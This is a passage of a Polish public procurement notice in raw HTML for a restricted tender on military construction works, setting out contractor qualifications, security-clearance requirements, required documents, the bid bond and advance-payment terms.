schematycznej (szkiców liniowych) powstałych obiektów wraz z dokumentacją powykonawczą budowy, wykonanej zgodnie z załącznikiem nr 1Po zakończeniu budowy Wykonawca jest zobowiązany doprowadzić cały obiekt do należytego porządku.IV.	Wszystkie materiały z rozbiórki podlegać będą komisyjnej weryfikacji i rozliczeniu przez Wykonawcę oraz dostarczeniu do wskazanego miejsca, zgodnie z obowiązującymi w tym zakresie przepisami wojskowymi i ochrony środowiska. V.	Wykonawca jest zobowiązany do dostarczenia najpóźniej w dniu podpisania umowy kosztorysów uproszczonych (branżowe) oraz zestawienie kosztów materiałów, kosztów robocizny i sprzętu dotyczących wyceny przedmiotu zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">7542600,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Całkowita wartość zamówienia wynosi 7 542 600,00 zł w tym zamówienie uzupełniające 1 740 600 zł</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-11-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Na potwierdzenie spełniania ww. warunku Wykonawcy wykażą, że spełniają wymogi ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (Dz. U. 2016.1167) w zakresie ochrony informacji niejawnych oznaczonych klauzulą ,,ZASTRZEŻONE", w tym:- zatrudnia pełnomocnika ds. ochrony informacji niejawnych,- zatrudnia przeszkolonego przez ABW lub SKW administratora niejawnego systemu teleinformatycznego,- zatrudnia przeszkolonego przez ABW lub SKW inspektora bezpieczeństwa teleinformatycznego,- posiada obsługę kancelaryjną dokumentów o klauzuli ,,ZASTRZEŻONE".</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny na etapie składania wniosków.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"> Wykonawca spełni warunek jeżeli wykaże, że:- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie zrealizował minimum dwa zamówienia obejmujące wykonanie robót budowlanych polegających na realizacji budowy, przebudowy, rozbudowy budynków o podobnej specyfice i zakresie co przedmiot zamówienia o wartości robót minimum 5 000 000,00 zł każdy.dysponuje: - osobami zdolnymi do wykonania niniejszego zamówienia, a mianowicie posiadających uprawnienia budowlane bez ograniczeń w rozumieniu ustawy z dnia 07.07.1994r. Prawo budowalne. (Dz. U.z 2016r. poz. 290 z zm.) lub odpowiadające im uprawnienia budowlane na podstawie wcześniej obowiązujących przepisów albo uprawnionych do sprawowania samodzielnej funkcji, na podstawie odrębnych przepisów prawa tj: a) osoba do kierowania i nadzorowania w specjalności konstrukcyjno - budowlanej (kierownik budowy),b) osoba do kierowania i nadzorowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych (kierownik robót teletechnicznych),c)	osoba do kierowania i nadzorowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (kierownik robót elektrycznych),d)	osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (kierownik robót sanitarnych),Wyżej wymienione osoby muszą na dzień składania wniosków oraz na cały czas trwania realizacji zamówienia przynależeć do Samorządu Zawodowego.- a także osoby:e) z uprawnieniami do montażu systemów alarmowych i kontroli dostępu, zaświadczeniem komendanta Wojewódzkiego Policji o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego oraz ukończonym kursem montażu tych systemów dla klas SA4 (osoby wykonujące montaż SSWiN).f) z uprawnieniami w zakresie geodezyjnych pomiarów sytuacyjno - wysokościowych, realizacyjnych i inwentaryzacyjnych (geodeta).Pracownicy skierowani przez Wykonawcę do realizacji zamówienia publicznego muszą posiadać poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą ,,ZASTRZEŻONE" lub pisemne upoważnienie Kierownika Jednostki Organizacyjnej oraz zaświadczenie stwierdzające odbycie przeszkolenia w zakresie ochrony informacji niejawnych.?	akredytowany system teleinformatyczny do przetwarzania informacji niejawnych o klauzuli ,,ZASTRZEŻONE".? obsługę kancelaryjną dokumentów niejawnych oznaczonych klauzulą ,,ZASTRZEŻONE". </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a)	na potwierdzenie spełnienia warunków udziału w postepowaniu:aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 2 do Ogłoszenia ?	aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 3 do Ogłoszenia, Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	na potwierdzenie spełnienia warunków udziału w postepowaniu:?	aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 2 do Ogłoszenia ?	wykaz wykonanych zamówień + dowody określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - załącznik nr 6 do Ogłoszenia?	Wykaz osób, które zostały skierowane przez Wykonawcę do realizacji zamówienia, o których mowa w Rozdziale VI pkt 1c - załącznik nr 4 do Ogłoszenia),dla osób nie będących etatowymi pracownikami Wykonawcy należy załączyć zobowiązanie do współpracy - załącznik nr 11 do ogłoszenia?	oświadczenie Wykonawcy dotyczące posiadania uprawnień oraz spełniania wymogów ustawy o ochronie informacji niejawnych przez osoby skierowane przez Wykonawcę do realizacji zamówienia - załącznik nr 9do Ogłoszenia,?	oświadczenie Wykonawcy o spełnianiu wymogów przepisów o ochronie informacji niejawnych - załącznik nr 10 + 10a;b)	na potwierdzenie braku podstaw do wykluczenia:?	aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 3 do Ogłoszenia, ?	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.c)	ponadto:?	Wypełniony i podpisany wniosek o dopuszczenie do udziału w przetargu ograniczonym - załącznik nr 1 do Ogłoszenia (oryginał podpisany przez Wykonawcę),?	Zobowiązanie innego podmiotu na zdolnościach, którego zamierza polegać Wykonawca w celu potwierdzenia udziału w postepowaniu - załącznik nr 7 Ogłoszenia (oryginał podpisany przez ten podmiot),?	pełnomocnictwo:o	dla osoby podpisującej wniosek, do podejmowania zobowiązań w imieniu Wykonawcy, (jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o ile nie wynika ono z przepisów prawa lub innych dokumentów,o	w przypadku podpisania wniosku i opatrzenia dokumentów klauzulą za zgodność z oryginałem przez osobę inną niż wymieniona w dokumencie rejestrowym, a reprezentującą Wykonawcę.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">a)	Zamawiający zaprosi do złożenia oferty nie mniej niż 5 nie więcej niż 20 Wykonawców, którzy spełnią warunki udziału w postepowaniu, o których mowa w Rozdziale VI Ogłoszenia.b)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 20, Zamawiający wyłoni Wykonawców przyznając punktację za wykazanie się większym doświadczeniem w zakresie budowy, przebudowy, rozbudowy budynków o podobnej specyfice i zakresie co przedmiot zamówienia o wartości robót minimum 5 000 000,00 zł każdy w ciągu ostatnich 5 lat.Za każdą wykonaną należycie realizację (ponad wymagane doświadczenie) w ww. zakresie Zamawiający przydzieli 1 punkt.c)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postepowaniu, będzie mniejsza niż 20, Zamawiający zaprosi do składania ofert wszystkich Wykonawców.</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">?	wykaz wykonanych zamówień + dowody określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - załącznik nr 6 do OgłoszeniaWykonawca nie ma obowiązku przedstawiania dowodów, o których mowa w zdaniu poprzednim, w stosunku do robót budowlanych wykonanych na rzecz Zamawiającego.	?	Wykaz osób, które zostały skierowane przez Wykonawcę do realizacji zamówienia, o których mowa w Rozdziale VI pkt 1c - załącznik nr 4 do Ogłoszenia),dla osób nie będących etatowymi pracownikami Wykonawcy należy załączyć zobowiązanie do współpracy - załącznik nr 11 do ogłoszenia?	oświadczenie Wykonawcy dotyczące posiadania uprawnień oraz spełniania wymogów ustawy o ochronie informacji niejawnych przez osoby skierowane przez Wykonawcę do realizacji zamówienia - załącznik nr 9do Ogłoszenia,?	oświadczenie Wykonawcy o spełnianiu wymogów przepisów o ochronie informacji niejawnych - załącznik nr 10 + 10a;?	aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 3 do Ogłoszenia, ?	Zobowiązanie innego podmiotu na zdolnościach, którego zamierza polegać Wykonawca w celu potwierdzenia udziału w postepowaniu - załącznik nr 7 Ogłoszenia (oryginał podpisany przez ten podmiot),</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">?	pełnomocnictwo:o	dla osoby podpisującej wniosek, do podejmowania zobowiązań w imieniu Wykonawcy, (jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o ile nie wynika ono z przepisów prawa lub innych dokumentów,o	w przypadku podpisania wniosku i opatrzenia dokumentów klauzulą za zgodność z oryginałem przez osobę inną niż wymieniona w dokumencie rejestrowym, a reprezentującą Wykonawcę.Oświadczenie o przynależności do grupy kapitałowej nie jest obowiązkowe na etapie składania wniosków Zgodnie z art. 24 ust. 11 ustawy Pzp każdy wykonawca wspólnie ubiegający się o udzielenie zamówienia jest zobowiązany złożyć stosowne oświadczenie w terminie 3 dni od dnia przekazania informacji, o której mowa w art. 51 ust. 1a ustawy Pzp.1)	Zgodnie z art. 22a ust 1- 6 ustawy Pzp wykonawca w celu potwierdzenia spełniania warunków, o których mowa w Rozdziale VI Ogłoszenia w stosownych sytuacjach oraz w odniesieniu do zamówienia może polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.2)	Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja" wystąpi wyłącznie w przypadku kiedy:a)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizuje zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. (załącznik nr 7 do Ogłoszenia)b)	Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełnienia warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust 1 pkt. 13-22 oraz art. 24 ust 5 pkt.1, 2 , 4.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w Rozdziale VII przedkłada dokumenty wymienione w § 7 i 8 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg ograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający będzie wymagał wniesienia wadium od Wykonawców, którzy zostaną zaproszeni do składania ofert. Wadium wynosi 175 000,00 zł (sto siedemdziesiąt pięć tysięcy złotych).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Tak</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek">1.	Zamawiający może udzielić Wykonawcy zaliczek na poczet wykonania przedmiotu umowy. 2.	Każda zaliczka może zostać udzielona w wysokości nieprzekraczającej 20% wynagrodzenia brutto ustalonego w § 14 ust. 1 niniejszej umowy. Pierwsza zaliczka może zostać udzielona w terminie 7 dni od protokolarnego przekazania terenu budowy.3.	Zaliczka może zostać wypłacona przez Zamawiającego na rzecz Wykonawcy w terminie 30 dni od doręczenia Zamawiającemu wniosku o wypłatę zaliczki wraz z fakturą zaliczkową (rachunkiem zaliczkowym) oraz z zabezpieczeniem zwrotu zaliczki.4.	Zabezpieczenie zaliczki winno być wniesione poprzez przedłożenie oryginału stosownego dokumentu właściwego dla wybranej i uzgodnionej przez strony niniejszej umowy formy zabezpieczenia. Wysokość zabezpieczenia musi odpowiadać co najmniej wysokości udzielanej zaliczki, a okres zabezpieczenia winien być nie krótszy niż 60 dni od końca obowiązywania niniejszej umowy. Zamawiający dokona zwrotu dokumentu gwarancyjnego w terminie 30 dni od rozliczenia zaliczki na poczet zabezpieczenia, której dokument był dany.5.	W wypadku udzielania Wykonawcy zaliczki, należne mu na podstawie § 14 ust. 1 niniejszej umowy wynagrodzenie zostanie stosownie pomniejszone o kwotę wypłaconej zaliczki. 6.	Zamawiający może udzielać kolejnej zaliczki tylko pod warunkiem wykazania przez Wykonawcę wykonania zamówienia do wartości poprzednio udzielonych zaliczek.7.	Udzielanie kolejnych zaliczek przez Zamawiającego wymaga przedstawienia przez Wykonawcę dowodów zapłaty wymagalnego wynagrodzenia Podwykonawcom i dalszym Podwykonawcom biorącym udział w realizacji części zamówienia, za którą zaliczka została wypłacona.8.	W przypadku nieprzedstawienia przez Wykonawcę wszystkich dowodów zapłaty, o których mowa w ust. 7, Zamawiający wstrzyma udzielenie kolejnej zaliczki, w części równej sumie kwot wynikających z nieprzedstawionych dowodów zapłaty.9.	Postanowienia powyższe nie naruszają praw i obowiązków Zamawiającego, Wykonawcy, Podwykonawcy i dalszego Podwykonawcy wynikających z przepisów art. 6471 ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny.</span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow">20</span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow">a)	Zamawiający zaprosi do złożenia oferty nie mniej niż 5 nie więcej niż 20 Wykonawców, którzy spełnią warunki udziału w postepowaniu, o których mowa w Rozdziale VI Ogłoszenia.b)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 20, Zamawiający wyłoni Wykonawców przyznając punktację za wykazanie się większym doświadczeniem w zakresie budowy, przebudowy, rozbudowy budynków o podobnej specyfice i zakresie co przedmiot zamówienia o wartości robót minimum 5 000 000,00 zł każdy w ciągu ostatnich 5 lat.Za każdą wykonaną należycie realizację (ponad wymagane doświadczenie) w ww. zakresie Zamawiający przydzieli 1 punkt.c)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postepowaniu, będzie mniejsza niż 20, Zamawiający zaprosi do składania ofert wszystkich Wykonawców.</span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span 